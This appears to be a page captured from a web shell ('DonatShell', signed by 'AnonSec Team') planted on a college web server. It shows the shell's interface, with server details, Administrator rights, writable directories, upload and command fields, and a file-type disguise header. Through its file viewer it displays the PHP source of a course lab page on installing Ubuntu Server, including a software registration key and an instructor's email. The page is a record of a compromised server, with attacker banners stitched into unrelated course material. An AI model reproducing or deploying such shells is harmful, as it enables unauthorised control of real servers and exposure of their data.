GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2608/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2608/_Archive/Lab01.php
<?
// Lab01.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');

$assignmentNumber = 1;
$assignmentType = "Lab";
$assignmentTitle = "Install Ubuntu Linux Server";
$evaluationType = "Lab";
$evaluationTitle = $assignmentTitle;
if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { 
$assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; }
if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle;

$title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
#$displayHeader = false;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$f_uId = formValue('uId'); if ( $f_uId ) { $userId = $f_uId; $userFullName = str_replace(" ","",username($userId)); } else { $userFullName = str_replace(" ","",$_SESSION['userFullName']); $userId = $_SESSION['userId']; }
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title.' - '.username($userId);
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>
<p>
<fieldset><legend>Description</legend>
Install Ubuntu server (linux variant) and begin to become familiar with the server.
</fieldset>

<fieldset><legend>Lab Instruction</legend>
<ol start="1">
  <li>Install Ubuntu Linux Server.
  	<ol type="a">
    	<li>Download and install <a href="../Setup/VMware/VMware-workstation-6.5.4-246459.exe">Vmware workstation 6.5.4 <span  style="white-space:nowrap;">(VMware-workstation-6.5.4-246459.exe)</span></a>.
      <br />The registration key is: <b>3UMPW-YAMD5-DA14Y-4MXX2</b>.
      <br />You can view a <a href="../Setup/VMware/VMwareInstall.avi">VMware installation</a>.
      <br>NOTE: You will need to download and install the <a href="http://cst.ridgewater.edu/Tech/Software/Multimedia/TechSmith%20Screen%20Capture%20Codec%20(TSCC)/tscc.exe">TechSmith Screen Capture Codec (TSCC)</a> to view the recording. If Windows 7 displays a "This program might not have installed correctly" message during the install click on "Reinstall using recommended settings". </li>
      <li>Download the <a href="dn/Ubuntu/ubuntu-8.04.1-server-i386.iso">Ubuntu Linux Server iso image <span  style="white-space:nowrap;">(ubuntu-8.04.1-server-i386.iso)</span></a>.</li>
      <li>Create a new Linux Virtual Machine. You can see my VMware setup <a href="Lab01/VMware/" target="_blank">here</a>.</li>
      <li>Either create a CD using the <a href="dn/Ubuntu/ubuntu-8.04.1-server-i386.iso">Ubuntu Linux Server iso image</a> or mount the image using Daemon Tools.</li>
      <li>Make sure the CD-ROM setting of the virtual machine is set to the CD and start the virtual machine.</li>
      <li>Install Ubuntu server. You can see my Ubuntu server install <a href="Lab01/ServerInstall/" target="_blank">here</a>.</li>
    </ol>
  </li>
	<li>
    	From a terminal window, enter the following commands: (If you have already installed the desktop <a href="Lab01/ServerInstall/#FromDesktop" target="_blank">see these two screenshots</a>)<br />
      <pre class="kbd">clear
uname -a
cat /etc/lsb-release</pre>
    </li>
    <li>
      Take a screenshot of the Terminal window and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFullName?>.png</b>.
      <br />I require the image to be in .png format. An example screenshot:
      <br /><img src="Labs/Lab01/ServerInstall/Screen25_LabProof.png" width="720" height="400" alt="clear, uname-a, cat /etc/lsb-release" />
			<br />If you have already installed the desktop software you can:
			<ol>
				<li>
					Open a Terminal window.
					<br />
					<img src="Labs/Lab01/ServerInstall/Desktop01_TerminalWindow.png" alt="Open a Terminal window">
				</li>
				<li>
					Enter the commands: <b>uname -a</b> and <b>cat /etc/lsb-release</b> for your <b style="white-space:nowrap;"><?=$courseNumber?>-Lab01a-<?=$userFullName?>.png</b> screen shot.
					<br />
					<img src="Labs/Lab01/ServerInstall/Desktop02_LabProof.png" alt="GUI clear, uname-a, cat /etc/lsb-release">
				</li>
			</ol>
    </li>
    <li>Install the Ubuntu desktop.
      <ol type="a">
      	<li>Update the server with the command: (I did not have any updates)
	        <br /><kbd>sudo apt-get update</kbd>
      	<li>Install the desktop with the command: (This took over 2 hrs at home)
	        <br /><kbd>sudo apt-get install ubuntu-desktop</kbd>
        </li>
      </ol>
    </li>
		<li>
			Install VMware Tools.
			<br />
			You may need the <a href="dn/Ubuntu/linux-headers-2.6.24-28-server_2.6.24-28.77_i386.deb">i386 linux-headers-2.6.24-28-server_2.6.24-28.77_i386.deb</a> or
			<a href="dn/Ubuntu/linux-headers-2.6.24-28-server_2.6.24-28.77_amd64.deb">amd64 linux-headers-2.6.24-28-server_2.6.24-28.77_amd64.deb</a>
		</li>
    <li>
      Restart your server and take a screenshot of the login screen and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFullName?>.png</b>.
      <br />I require the image to be in .png format. An example screenshot:
      <br /><img src="Labs/Lab01/Ubuntu_login.png" alt="Ubuntu login" />
    </li>
    <li>
     	<a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> <?=$evaluationName?> Submission">Send an email</a> to jim.martinson@ridgewater.edu with a subject of <b style="white-space:nowrap"><?=$courseNumber?> <?=$evaluationName?> Submission</b> and attach the following files:
      <ol type="a">
      	<li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFullName?>.png.</li>
      	<li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFullName?>.png.</li>
      </ol>
    </li>
</ol>
</fieldset>

<fieldset class="pio"><legend>Grading Criteria</legend>
Demonstrated assignment effectively: 10 points.
<br />
There are some things I expect. If they are incorrect you will lose the following:
<br />
Incorrect attachment file name: -1 pt.
<br />
Work submitted incorrectly: -1pt.
<br />
Incorrect subject in email: -1pt.
<br />
Second and subsequent submission of work for grading: -1pt.
<br />
Work submitted late: -1pt.
</fieldset>

<fieldset class="pio"><legend>Objectives</legend>
<ol class="obj pio" start="3">
	<!-- 1 3 -->
	<li>Install Linux server.</li>
</ol>
</fieldset>

<fieldset><legend>Notes</legend>
Here is a <a href="Labs/<?=$evaluationName?>/<?=$evaluationName?>.zip"><?=$evaluationName?>.zip</a> file with examples of what must be turned in as well as gedit and sudo scripts to help with the assignment.<br />
<?
#$thisFile=__FILE__; $thisLine=__LINE__; include('LabNotes.phpinc');
?>
</fieldset>
<?
$thisFile=__FILE__; $thisLine=__LINE__; include('ReferencesResources.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team